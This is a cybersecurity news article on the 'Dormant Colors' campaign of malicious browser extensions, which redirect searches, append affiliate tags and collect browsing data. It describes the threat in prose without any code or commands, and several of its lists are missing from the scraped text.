It has recently been discovered by the security researchers at Guardio Labs that a new malvertising campaign is on the loose. This malicious campaign is intended to achieve the following objectives:
The cybersecurity researchers titled this malvertising campaign “Dormant Colors.” In total 30 variants of malicious extensions have been identified by security experts during the second half of October 2022 on the web stores of popular web browsers:-
The surprising thing about these malicious browser extensions is they all have managed to achieve more than 1 million active installs globally.
The operators of this campaign designed all the malicious extensions in such a way that they easily evade detection since it doesn’t contain any malicious code and offers multiple color customization options to lucrate the users.
When a victim visits a website that offers video or downloadable content, the victim will be bombarded with advertisements and malicious redirects that lead to the initial infection chain.
Here in the below video you can see it in action:-
It should be noted that upon installation of these extensions, they side-load the malicious scripts by redirecting the victims to the multiple dangerous web pages.
The primary objective of these malicious scripts is to make the extension perform search hijacking and insert affiliate links.
These malicious extensions are capable of redirecting the search queries to fetch the search results from the websites that are associated with the developers of the extensions.
By doing this, ad impressions and the sale of search data will generate a hefty revenue for the threat actors or the operators of these malicious extensions.
On top of this, Dormant Colors also steals the browsing data of the victim from a comprehensive list of 10,000 websites. What the threat actors do is, they automatically redirect the victim to a page which contains affiliate links that are advertised as part of the URL.
It is the operators of the malicious extensions who will generate a commission on every sale made on the site once the affiliate tags are appended to the URL.
It is possible that Dormant Colors’ operators may achieve far more detrimental things than hijacking affiliations using these same stealthy malicious techniques.
Not only that, but threat actors also get the ability to redirect victims to fake websites with malicious scripts that steal the credentials of the following services:-
Despite this, neither of these campaigns seems to be performing any malicious activities since there is no indication that they are.
Cyber Attack with Zero Trust Networking – Download Free E-Book
In a resounding triumph for justice, U.S. District Judge Kathryn Kimball Mizelle has sentenced Vitalii…
Hackers are plotting to benefit from the generosity of Halloween, Thanksgiving, and Christmas shoppers using…
The LLMs (Large Language Models) are evolving rapidly with continuous advancements in their research and…
In the dynamic realm of mobile application security, cybercriminals employ ever more sophisticated forms of…
A recent campaign has been observed to be delivering DJvu ransomware through a loader that…
In a pivotal update to the Okta security incident divulged in October 2023, Okta Security…